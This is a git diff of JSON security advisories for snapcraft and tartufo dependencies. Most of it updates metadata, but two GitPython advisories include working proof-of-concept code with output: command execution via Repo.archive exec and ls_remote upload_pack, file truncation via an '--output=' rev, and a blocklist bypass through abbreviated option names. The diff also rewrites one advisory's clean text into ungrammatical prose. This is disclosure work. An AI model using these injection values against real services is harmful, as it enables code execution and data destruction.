"ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-44431.json b/advisories/BREW-snapcraft-CVE-2026-44431.json index 37d0b05c5f3..ac8bd5c4048 100644 --- a/advisories/BREW-snapcraft-CVE-2026-44431.json +++ b/advisories/BREW-snapcraft-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-44431", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-44432.json b/advisories/BREW-snapcraft-CVE-2026-44432.json index 88a6ab82366..67c5c72c501 100644 --- a/advisories/BREW-snapcraft-CVE-2026-44432.json +++ b/advisories/BREW-snapcraft-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-44432", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-45409.json b/advisories/BREW-snapcraft-CVE-2026-45409.json index 597b6bcd834..431892af62d 100644 --- a/advisories/BREW-snapcraft-CVE-2026-45409.json +++ b/advisories/BREW-snapcraft-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-45409", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-59890.json b/advisories/BREW-snapcraft-CVE-2026-59890.json index 680776893fc..87345fe9d77 100644 --- a/advisories/BREW-snapcraft-CVE-2026-59890.json +++ b/advisories/BREW-snapcraft-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-59890", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -40,14 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2026-59939.json b/advisories/BREW-snapcraft-CVE-2026-59939.json index 3ba44aa1409..ee4b40d94d8 100644 --- a/advisories/BREW-snapcraft-CVE-2026-59939.json +++ b/advisories/BREW-snapcraft-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2026-59939", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-23T21:40:03Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httplib2", - "subject_version": "0.32.0", - "key": "pkg:pypi/httplib2@0.32.0", - "resource": "httplib2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2022-24439.json b/advisories/BREW-tartufo-CVE-2022-24439.json index 4a589298e06..c18e908c0f7 100644 --- a/advisories/BREW-tartufo-CVE-2022-24439.json +++ b/advisories/BREW-tartufo-CVE-2022-24439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2022-24439", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-hcpj-qp55-gfph", "CVE-2022-24439", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2023-40267.json b/advisories/BREW-tartufo-CVE-2023-40267.json index 45e709e4a46..6b53d52f5c7 100644 --- a/advisories/BREW-tartufo-CVE-2023-40267.json +++ b/advisories/BREW-tartufo-CVE-2023-40267.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2023-40267", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-pr76-5cm5-w9cj", "CVE-2023-40267", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2023-40590.json b/advisories/BREW-tartufo-CVE-2023-40590.json index 9653618e035..9b38213672b 100644 --- a/advisories/BREW-tartufo-CVE-2023-40590.json +++ b/advisories/BREW-tartufo-CVE-2023-40590.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2023-40590", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-wfm5-v35h-vwf4", "CVE-2023-40590", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2023-41040.json b/advisories/BREW-tartufo-CVE-2023-41040.json index 9f997b63411..6c28115bdf2 100644 --- a/advisories/BREW-tartufo-CVE-2023-41040.json +++ b/advisories/BREW-tartufo-CVE-2023-41040.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2023-41040", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-cwvm-v4w8-q58c", "CVE-2023-41040", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2024-22190.json b/advisories/BREW-tartufo-CVE-2024-22190.json index 5d386aab212..01c237abcf9 100644 --- a/advisories/BREW-tartufo-CVE-2024-22190.json +++ b/advisories/BREW-tartufo-CVE-2024-22190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2024-22190", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:07:24Z", "upstream": [ "GHSA-2mqj-m65w-jghx", "CVE-2024-22190", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-42215.json b/advisories/BREW-tartufo-CVE-2026-42215.json index b20494f497d..76ee2f7dd7f 100644 --- a/advisories/BREW-tartufo-CVE-2026-42215.json +++ b/advisories/BREW-tartufo-CVE-2026-42215.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-42215", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-rpm5-65cw-6hj4", "CVE-2026-42215", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-42284.json b/advisories/BREW-tartufo-CVE-2026-42284.json index 0c1d1537849..deeab588be0 100644 --- a/advisories/BREW-tartufo-CVE-2026-42284.json +++ b/advisories/BREW-tartufo-CVE-2026-42284.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-42284", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-x2qx-6953-8485", "CVE-2026-42284", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-44243.json b/advisories/BREW-tartufo-CVE-2026-44243.json index 9f64f2860d2..bc12c624b71 100644 --- a/advisories/BREW-tartufo-CVE-2026-44243.json +++ b/advisories/BREW-tartufo-CVE-2026-44243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-44243", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-7545-fcxq-7j24", "CVE-2026-44243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-44244.json b/advisories/BREW-tartufo-CVE-2026-44244.json index 2058d255a78..d807e928e9f 100644 --- a/advisories/BREW-tartufo-CVE-2026-44244.json +++ b/advisories/BREW-tartufo-CVE-2026-44244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-44244", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-v87r-6q3f-2j67", "CVE-2026-44244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-67322.json b/advisories/BREW-tartufo-CVE-2026-67322.json index aa41c2dced6..b0e2da0d760 100644 --- a/advisories/BREW-tartufo-CVE-2026-67322.json +++ b/advisories/BREW-tartufo-CVE-2026-67322.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-67322", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-rwj8-pgh3-r573", - "CVE-2026-67322" + "CVE-2026-67322", + "PYSEC-2026-3842" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rwj8-pgh3-r573" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67322" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2172" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.52" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-environment-variable-exfiltration-via-clone-from" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-67323.json b/advisories/BREW-tartufo-CVE-2026-67323.json index 97b262ed138..02dc44059d9 100644 --- a/advisories/BREW-tartufo-CVE-2026-67323.json +++ b/advisories/BREW-tartufo-CVE-2026-67323.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-67323", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-956x-8gvw-wg5v", - "CVE-2026-67323" + "CVE-2026-67323", + "PYSEC-2026-3839" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: command injection via unguarded Git options in `Repo.archive()`, `git.ls_remote()`, and arbitrary file overwrite via `Repo.iter_commits()` / `Repo.blame()`", - "details": "## Summary\n\nGitPython spawns the real `git` binary with an argument vector built from caller-supplied values. To prevent argument injection, GitPython maintains denylists of \"unsafe\" Git options (`--upload-pack`, `--receive-pack`, `--exec`, `-c`, `--config`, …) that can be abused to run arbitrary commands, and enforces them with `Git.check_unsafe_options()`.\n\nThat enforcement is only wired into the **network** commands — `clone_from`, `Remote.fetch`, `Remote.pull`, `Remote.push`. Several other public APIs that also forward caller-controlled values into the `git` argv have **no guard at all**:\n\n1. **`Repo.archive(ostream, treeish=None, prefix=None, **kwargs)`** forwards `**kwargs` verbatim into `git archive`. An attacker-influenced options mapping such as `{\"remote\": \".\", \"exec\": \"\"}` becomes `git archive --remote=. --exec= -- `, and `git archive --remote=` invokes `git-upload-archive` whose path is overridden by `--exec` → **arbitrary command execution under default Git configuration** (no `protocol.ext.allow` needed).\n\n2. **`repo.git.ls_remote(, upload_pack=\"\")`** (and the dynamic-command builder generally) turns the `upload_pack` kwarg into `--upload-pack=` with no guard → **arbitrary command execution**.\n\n3. **`Repo.iter_commits(rev)`** and **`Repo.blame(rev, file)`** place the caller's `rev` value into the argv *before* the `--` end-of-options separator and apply no leading-dash check. A benign-looking ref value such as `--output=/path/to/file` is parsed by `git rev-list` / `git blame` as the `--output` option, which **opens and truncates an arbitrary file** before Git even validates the revision → arbitrary file clobber (integrity/availability; can destroy keys, configs, lockfiles, or be aimed at files the host later sources).\n\nThe first two are direct code execution; the third is an arbitrary file-overwrite primitive. All share one root cause: the `check_unsafe_options` / end-of-options discipline that GitPython applies to clone/fetch/pull/push was never extended to these sinks.\n\n## Details\n\nGitPython explicitly recognises these options as command-execution vectors. `git/remote.py:535`:\n\n```python\nunsafe_git_fetch_options = [\n # Arbitrary command execution.\n \"--upload-pack\",\n \"--receive-pack\",\n # Arbitrary file overwrite.\n \"--exec\",\n]\n```\n\nand enforces them via `Git.check_unsafe_options()` (`git/cmd.py:963`):\n\n```python\ndef check_unsafe_options(cls, options, unsafe_options):\n ...\n if unsafe_option is not None:\n raise UnsafeOptionError(f\"{unsafe_option} is not allowed, use `allow_unsafe_options=True` to allow it.\")\n```\n\nBut `check_unsafe_options` is invoked from **only five sites**, all network commands:\n\n```\ngit/remote.py:1071 Remote.fetch\ngit/remote.py:1125 Remote.pull\ngit/remote.py:1198 Remote.push\ngit/repo/base.py:1410 / :1412 Repo.clone_from\n```\n\nThe following sinks call `git` with caller-controlled options/positionals and are **not** guarded:\n\n### 1. `Repo.archive` — command execution (`git/repo/base.py:1623`)\n\n```python\ndef archive(self, ostream, treeish=None, prefix=None, **kwargs):\n ...\n self.git.archive(\"--\", treeish, *path, **kwargs)\n return self\n```\n\n`treeish` and `path` are correctly placed after `--`, but `**kwargs` are converted by `Git.transform_kwarg` (`git/cmd.py:1487`) into `--=` flags and inserted **before** the `--` by `_call_process`, with no `check_unsafe_options`. `Repo.archive` already documents user-facing kwargs (`format`, `prefix`, `path`), so forwarding a caller options mapping is an expected usage. Final argv:\n\n```\ngit archive --remote=. --exec= -- \n```\n\n`git archive --remote=` runs the upload-archive helper; `--exec=` overrides the helper path, executing `` on the host. This works with **default Git config** — it does not rely on the `ext::` transport (which is blocked by default).\n\n### 2. `repo.git.ls_remote(..., upload_pack=...)` — command execution (dynamic builder, `git/cmd.py:1487`)\n\n`transform_kwarg` dashifies `upload_pack` → `--upload-pack=`. `git ls-remote --upload-pack=` executes ``. The dynamic builder makes **both** the flag name and value caller-controlled (`repo.git.(**user_dict)`), and `ls_remote` has no `check_unsafe_options`.\n\nThis is exactly the underscore-kwarg-vs-hyphen-kwarg gap that CVE-2026-42215 fixed for `fetch`/`pull`/`push`/`clone_from` — but `ls_remote` and the rest of the dynamic surface were left unpatched.\n\n### 3. `Repo.iter_commits` / `Repo.blame` — arbitrary file overwrite (`git/objects/commit.py:348`, `git/repo/base.py:1199`)\n\n```python\n# Commit.iter_items (reached via Repo.iter_commits)\nproc = repo.git.rev_list(rev, args_list, as_process=True, **kwargs) # args_list == [\"--\", *paths]\n```\n\n```python\n# Repo.blame\ndata = self.git.blame(rev, *rev_opts, \"--\", file, p=True, stdout_as_string=False, **kwargs)\n```\n\n`rev` is placed **before** `--`, with no leading-dash check anywhere in the path. A caller passing `rev=\"--output=/path\"` (a value that looks like an ordinary ref/branch/tag string an app forwards from user input) produces:\n\n```\ngit rev-list --output=/path --\n```\n\n`git rev-list`/`log`/`blame` honour `--output=`, which `open()`s and truncates the file *before* validating the revision — so the file is destroyed even though Git then errors out on the bad revision.\n\n## PoC\n\nAll three PoCs are self-contained, run against the released **GitPython 3.1.50** under **default Git configuration**, and were executed live (git 2.51.0). Each prints a host-side marker proving the effect.\n\n### Install\n\n```bash\npython3 -m venv venv && . venv/bin/activate\npip install GitPython # resolves to 3.1.50\npython -c \"import git; print(git.__version__)\" # 3.1.50\n```\n\n### PoC 1 — command execution via `Repo.archive`\n\n```python\n# archive_rce.py\nimport io, os, tempfile, subprocess, git\n\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\n\nmarker = os.path.join(tempfile.gettempdir(), 'gp_rce_marker')\nif os.path.exists(marker): os.remove(marker)\n\n# a service lets a user export a repo and forwards their options dict\nopts = {'remote': '.', 'exec': 'touch ' + marker}\ntry:\n repo.archive(io.BytesIO(), **opts)\nexcept git.exc.GitCommandError as e:\n print('[*] git exited non-zero (expected), but the exec already ran:', str(e).splitlines()[0][:60])\n\nprint('[+] marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git exited non-zero (expected), but the exec already ran: Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n`git config --get protocol.ext.allow` returns nothing (unset = default), confirming no special config is required.\n\n### PoC 2 — command execution via `git.ls_remote(upload_pack=...)`\n\n```python\n# lsremote_rce.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nmarker = os.path.join(tempfile.gettempdir(),'gp_lsr_marker')\nif os.path.exists(marker): os.remove(marker)\ntry:\n repo.git.ls_remote('.', upload_pack='touch '+marker+';')\nexcept git.exc.GitCommandError as e:\n print('[*] git err:', str(e).splitlines()[0][:50])\nprint('[+] ls-remote marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git err: Cmd('git') failed due to: exit code(128)\n[+] ls-remote marker present: True\n```\n\n### PoC 3 — arbitrary file overwrite via a benign-looking `rev`\n\n```python\n# itercommits_filewrite.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nvictim = os.path.join(tempfile.gettempdir(),'gp_fw_victim')\nopen(victim,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(victim).read()))\nuser_ref = '--output=' + victim # value an app forwards as a \"ref/branch\"\ntry:\n list(repo.iter_commits(user_ref))\nexcept git.exc.GitCommandError as e:\n print('[*] git err (after open+truncate):', str(e).splitlines()[0][:50])\nprint('[+] after :', repr(open(victim).read()), '<- truncated')\n```\n\nVerbatim output:\n\n```\n[*] before: 'do not delete\\n'\n[*] git err (after open+truncate): Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", + "details": "## Summary\n\nGitPython already know that --upload-pack / --exec are command-exec vectors, they are denylist in\ngit/remote.py:535 and check by Git.check_unsafe_options() (git/cmd.py:963), the thing is this\ncheck him he is only call from fetch, pull, push and clone_from, everything else who build a git\nargv from caller values just go through, no check, three examples\n\n## Code analysis\n\nRepo.archive (git/repo/base.py:1623) do self.git.archive(\"--\", treeish, *path, **kwargs), the\ntreeish is after the --, but the kwargs get dashify by transform_kwarg (git/cmd.py:1487) and\nthey land before it, so {\"remote\": \".\", \"exec\": \"\"} give\ngit archive --remote=. --exec= -- , the --remote spawn the upload-archive helper and\n--exec choose which binary that is, done, default git config, no protocol.ext.allow needed, and\narchive already document caller kwargs (format, prefix, path) so pass a dict is normal usage\n\nrepo.git.ls_remote(url, upload_pack=\"\"), same builder, same result, it's exactly the kwarg\ngap that CVE-2026-42215 close for fetch/pull/push/clone_from, except the dynamic\nrepo.git.(**user_dict) surface him he never got the fix\n\nRepo.iter_commits / Repo.blame (git/objects/commit.py:348, git/repo/base.py:1199) put the rev\nbefore the --, no leading-dash check, a \"branch name\" like --output=/etc/whatever become\ngit rev-list --output=... --, and git he open and truncate that file before he even validate the\nrevision, the file is gone even if the command error right after\n\n## PoC\n\nReleased 3.1.50, git 2.51.0, stock config (`git config --get protocol.ext.allow` returns nothing here).\n\n```\npip install GitPython # 3.1.50\n```\n\nCommon setup for the three:\n\n```python\nimport io, os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\ntmp = tempfile.gettempdir()\n```\n\n1. exec via archive (a service exports a repo and forwards the user's options dict):\n\n```python\nm = os.path.join(tmp, 'gp_archive_check')\ntry: repo.archive(io.BytesIO(), **{'remote': '.', 'exec': 'touch ' + m})\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n2. exec via ls_remote:\n\n```python\nm = os.path.join(tmp, 'gp_lsremote_check')\ntry: repo.git.ls_remote('.', upload_pack='touch ' + m + ';')\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n3. file clobber via a rev that looks like a ref:\n\n```python\nv = os.path.join(tmp, 'release_notes.txt')\nopen(v,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(v).read()))\ntry: list(repo.iter_commits('--output=' + v))\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] after :', repr(open(v).read()), '<- truncated')\n```\n```\n[*] before: 'do not delete\\n'\n[*] Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-956x-8gvw-wg5v" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67323" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2163" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-unguarded-git-options" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-67324.json b/advisories/BREW-tartufo-CVE-2026-67324.json index 262c9276db0..23fa18b7e11 100644 --- a/advisories/BREW-tartufo-CVE-2026-67324.json +++ b/advisories/BREW-tartufo-CVE-2026-67324.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-67324", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-v396-v7q4-x2qj", - "CVE-2026-67324" + "CVE-2026-67324", + "PYSEC-2026-3947" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-67325.json b/advisories/BREW-tartufo-CVE-2026-67325.json index 6c243192bf8..f8a66afd02d 100644 --- a/advisories/BREW-tartufo-CVE-2026-67325.json +++ b/advisories/BREW-tartufo-CVE-2026-67325.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-67325", "published": "2026-08-13T17:42:18Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:07:24Z", "upstream": [ "GHSA-2f96-g7mh-g2hx", - "CVE-2026-67325" + "CVE-2026-67325", + "PYSEC-2026-3836" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Command Injection via git long-option prefix abbreviation bypass of CVE-2026-42215 blocklist", - "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**CWE:** CWE-184 (Incomplete List of Disallowed Inputs) → CWE-78 (OS Command Injection)\n**Severity:** inherits the parent CVE-2026-42215 surface; estimated High, ~8.8 (`AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) — final scoring deferred to maintainer/CNA, mirroring the parent.\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites 